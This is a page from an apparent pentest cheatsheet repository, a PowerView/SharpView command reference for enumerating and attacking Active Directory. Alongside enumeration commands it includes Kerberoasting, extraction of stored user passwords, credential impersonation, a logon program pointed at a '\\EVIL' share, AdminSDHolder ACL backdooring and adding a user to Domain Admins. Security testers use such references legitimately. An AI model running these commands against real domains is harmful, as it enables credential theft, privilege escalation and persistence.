daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

powerview.md (17620B)


      1 ---
      2 title: "PowerView/SharpView"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/basic-powershell-for-pentesters/powerview.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/basic-powershell-for-pentesters/powerview.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # PowerView/SharpView
     14 
     15 The final PowerView version published in the now-archived PowerSploit project is available in its development branch: [PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1).<sup>[[1]](#references)</sup>
     16 
     17 [**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of PowerView. The examples below are a practical command reference; confirm parameters against the version you are running because PowerView aliases and behavior vary between releases.<sup>[[1]](#references)[[2]](#references)</sup>
     18 
     19 ## Quick enumeration
     20 
     21 ```bash
     22 Get-NetDomain #Basic domain info
     23 #User info
     24 Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
     25 Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
     26 Get-NetUser -PreauthNotRequired #ASREPRoastable users
     27 Get-NetUser -SPN #Kerberoastable users
     28 #Groups info
     29 Get-NetGroup | select samaccountname, admincount, description
     30 Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders
     31 #Computers
     32 Get-NetComputer | select samaccountname, operatingsystem
     33 Get-NetComputer -Unconstrained | select samaccountname #DCs always appear but aren't useful for privilege escalation
     34 Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation
     35 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
     36 #Shares
     37 Find-DomainShare -CheckShareAccess #Search readable shares
     38 #Domain trusts
     39 Get-NetDomainTrust #Get all domain trusts (parent, children and external)
     40 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
     41 #LHF
     42 #Check if any user passwords are set
     43 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
     44 #Asks the DC for all computers and checks each one for local admin access (very noisy). RPC and SMB ports must be open.
     45 Find-LocalAdminAccess
     46 #Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.
     47 Invoke-UserHunter -CheckAccess
     48 #Find interesting ACLs
     49 Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
     50 ```
     51 
     52 ## Domain info
     53 
     54 ```bash
     55 # Domain Info
     56 Get-Domain #Get info about the current domain
     57 Get-NetDomain #Get info about the current domain
     58 Get-NetDomain -Domain mydomain.local
     59 Get-DomainSID #Get domain SID
     60 
     61 # Policy
     62 Get-DomainPolicy #Get info about the policy
     63 (Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
     64 (Get-DomainPolicy)."SystemAccess" #Password policy
     65 Get-DomainPolicyData | select -ExpandProperty SystemAccess #Same as previous
     66 (Get-DomainPolicy).PrivilegeRights #Check your privileges
     67 Get-DomainPolicyData # Same as Get-DomainPolicy
     68 
     69 # Domain Controller
     70 Get-DomainController | select Forest, Domain, IPAddress, Name, OSVersion | fl # Get specific info of current domain controller
     71 Get-NetDomainController -Domain mydomain.local #Get domain controllers for the specified domain
     72 
     73 # Get Forest info
     74 Get-ForestDomain
     75 ```
     76 
     77 ## Users, Groups, Computers & OUs
     78 
     79 ```bash
     80 # Users
     81 ## Get usernames and their groups
     82 Get-DomainUser -Properties name, MemberOf | fl
     83 ## Get-DomainUser and Get-NetUser are kind of the same
     84 Get-NetUser #Get users with several (not all) properties
     85 Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #List all usernames
     86 Get-NetUser -UserName student107 #Get info about a user
     87 Get-NetUser -properties name, description #Get all descriptions
     88 Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount  #Get all pwdlastset, logoncount and badpwdcount
     89 Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter
     90 # Get users with reversible encryption (PWD in clear text with dcsync)
     91 Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
     92 
     93 # Users Filters
     94 Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
     95 Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users
     96 Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card
     97 Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users
     98 Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
     99 Get-NetUser -PreauthNotRequired #ASREPRoastable users
    100 Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users
    101 Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable
    102 Get-Netuser -TrustedToAuth | select userprincipalname, name, msds-allowedtodelegateto #Constrained Resource Delegation
    103 Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
    104 # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
    105 Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
    106     ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
    107 }
    108 # Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy
    109 ## Users with this flag might have empty passwords (if allowed) or shorter passwords
    110 Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
    111 
    112 #Groups
    113 Get-DomainGroup | where Name -like "*Admin*" | select SamAccountName
    114 ## Get-DomainGroup is similar to Get-NetGroup
    115 Get-NetGroup #Get groups
    116 Get-NetGroup -Domain mydomain.local #Get groups from a specific domain
    117 Get-NetGroup 'Domain Admins' #Get all data of a group
    118 Get-NetGroup -AdminCount | select name,memberof,admincount,member | fl #Search administrative groups
    119 Get-NetGroup -UserName "myusername" #Get groups of a user
    120 Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
    121 Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest
    122 Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)
    123 Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer
    124 Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder users
    125 Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} #Get ObjectACLs by sid
    126 Get-NetGPOGroup #Get restricted groups
    127 
    128 # Computers
    129 Get-DomainComputer -Properties DnsHostName #Get the DNS hostnames of domain computers
    130 ## Get-DomainComputer is kind of the same as Get-NetComputer
    131 Get-NetComputer #Get all computer objects
    132 Get-NetComputer -Ping #Send a ping to check if the computers are working
    133 Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privilege escalation
    134 Get-NetComputer -TrustedToAuth #Find computers with constrained delegation
    135 Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
    136 
    137 #OU
    138 Get-DomainOU -Properties Name | sort -Property Name #Get names of OUs
    139 Get-DomainOU "Servers" | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties Name} #Get all computers inside an OU (Servers in this case)
    140 ## Get-DomainOU is kind of the same as Get-NetOU
    141 Get-NetOU #Get Organization Units
    142 Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
    143 ```
    144 
    145 ## Logon and Sessions
    146 
    147 ```bash
    148 Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
    149 Get-NetSession -ComputerName <servername> #Get active sessions on the host
    150 Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
    151 Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
    152 Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
    153 ```
    154 
    155 ## Group Policy Object - GPOs
    156 
    157 If an attacker has **high privileges over a GPO**, they may be able to **escalate privileges** by granting permissions to a user, adding a local administrator to a host, or creating an immediate scheduled task.\
    158 For [**more info about it and how to abuse it follow this link**](../active-directory-methodology/acl-persistence-abuse/index.html#gpo-delegation).
    159 
    160 ```bash
    161 #GPO
    162 Get-DomainGPO | select displayName #Check the names for info
    163 Get-NetGPO #Get all policies with details
    164 Get-NetGPO | select displayname #Get the names of the policies
    165 Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
    166 gpresult /V #Get current policy
    167 
    168 # Get who can create new GPOs
    169 Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=invented,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
    170 
    171 # Enumerate permissions for GPOs where users with RIDs of > 1000 have some kind of modification/control rights
    172 Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
    173 
    174 # Get permissions a user/group has over any GPO
    175 $sid=Convert-NameToSid "Domain Users"
    176 Get-DomainGPO | Get-ObjectAcl | ?{$_.SecurityIdentifier -eq $sid}
    177 
    178 # Convert GPO GUID to name
    179 Get-GPO -Guid 18E5A689-E67F-90B2-1953-198ED4A7F532
    180 
    181 # Transform SID to name
    182 ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1126
    183 
    184 # Get GPO of an OU
    185 Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}'
    186 
    187 # Returns all GPOs that modify local group memberships through Restricted Groups or Group Policy Preferences.
    188 Get-DomainGPOLocalGroup | select GPODisplayName, GroupName, GPOType
    189 
    190 # Enumerates the machines where a specific domain user/group is a member of a specific local group.
    191 Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators | select ObjectName, GPODisplayName, ContainerName, ComputerName
    192 ```
    193 
    194 Learn how to **exploit permissions over GPOs and ACLs** in:
    195 
    196 
    197 [Acl Persistence Abuse](/hacktricks/windows-hardening/active-directory-methodology/acl-persistence-abuse/overview)
    198 
    199 ## ACL
    200 
    201 ```bash
    202 #Get ACLs of an object (permissions of other objects over the indicated one)
    203 Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs
    204 
    205 #Other way to get ACLs of an object
    206 $sid = Convert-NameToSid <username/group>
    207 Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
    208 
    209 #Get permissions of a file
    210 Get-PathAcl -Path "\\dc.mydomain.local\sysvol"
    211 
    212 #Find interesting ACEs (modification rights held by unexpected objects with RID > 1000)
    213 Find-InterestingDomainAcl -ResolveGUIDs
    214 
    215 #Check whether any interesting permission is related to a username/group
    216 Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
    217 
    218 #Get special rights over All administrators in domain
    219 Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights
    220 ```
    221 
    222 ## Shared files and folders
    223 
    224 ```bash
    225 Get-NetFileServer #Search file servers, where many users may have active sessions
    226 Find-DomainShare -CheckShareAccess #Search readable shares
    227 Find-InterestingDomainShareFile #Find interesting files, can use filters
    228 ```
    229 
    230 ## Domain Trust
    231 
    232 ```bash
    233 Get-NetDomainTrust #Get all domain trusts (parent, children and external)
    234 Get-DomainTrust #Same
    235 Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
    236 Get-DomainTrustMapping #Enumerate also all the trusts
    237 
    238 Get-ForestDomain # Get basic forest info
    239 Get-ForestGlobalCatalog #Get info of current forest (no external)
    240 Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
    241 Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)"
    242 
    243 Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
    244 
    245 Get-DomainForeignUser #Get users with privileges in other domains inside the forest
    246 Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
    247 ```
    248 
    249 ## Low-hanging fruit
    250 
    251 ```bash
    252 #Check if any user passwords are set
    253 $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
    254 
    255 #Asks the DC for all computers and checks each one for local admin access (very noisy). RPC and SMB ports must be open.
    256 Find-LocalAdminAccess
    257 
    258 #(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed.
    259 .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
    260 
    261 #Enumerate machines where a particular user/group identity has local admin rights
    262 Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
    263 
    264 # Enumerates the members of specified local group (default administrators)
    265 # for all the targeted machines on the current (or specified) domain.
    266 Invoke-EnumerateLocalAdmin
    267 Find-DomainLocalGroupMember
    268 
    269 #Search unconstrained delegation computers and show users
    270 Find-DomainUserLocation -ComputerUnconstrained -ShowAll
    271 
    272 #Admin users that allow delegation, logged into servers that allow unconstrained delegation
    273 Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
    274 
    275 #Get members from Domain Admins (default) and a list of computers
    276 # and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host.
    277 # If -CheckAccess is used, it also checks for local administrator access on the hosts.
    278 ## By default users inside Domain Admins are searched
    279 Find-DomainUserLocation [-CheckAccess] | select UserName, SessionFromName
    280 Invoke-UserHunter [-CheckAccess]
    281 
    282 #Search "RDPUsers" users
    283 Invoke-UserHunter -GroupName "RDPUsers"
    284 
    285 #It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
    286 Invoke-UserHunter -Stealth
    287 ```
    288 
    289 ## Deleted objects
    290 
    291 ```bash
    292 #This is not a PowerView command; it comes from Microsoft's Active Directory PowerShell module
    293 #You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
    294 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
    295 ```
    296 
    297 ## Miscellaneous
    298 
    299 ### SID to Name
    300 
    301 ```bash
    302 "S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
    303 ```
    304 
    305 ### Kerberoast
    306 
    307 ```bash
    308 Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
    309 ```
    310 
    311 ### Use different credentials (argument)
    312 
    313 ```bash
    314 # Use alternate credentials with any supported function
    315 $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
    316 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
    317 Get-DomainUser -Credential $Cred
    318 ```
    319 
    320 ### Impersonate a user
    321 
    322 ```bash
    323 # if running in -sta mode, impersonate another credential a la "runas /netonly"
    324 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
    325 $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
    326 Invoke-UserImpersonation -Credential $Cred
    327 # ... action
    328 Invoke-RevertToSelf
    329 ```
    330 
    331 ### Set values
    332 
    333 ```bash
    334 # set the specified property for the given user identity
    335 Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
    336 # Set the owner of 'dfm' in the current domain to 'harmj0y'
    337 Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
    338 # Backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
    339 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
    340 # Add user to 'Domain Admins'
    341 Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
    342 ```
    343 
    344 ## References
    345 
    346 - [1] [PowerSploit - PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
    347 - [2] [SharpView - .NET port of PowerView](https://github.com/tevora-threat/SharpView)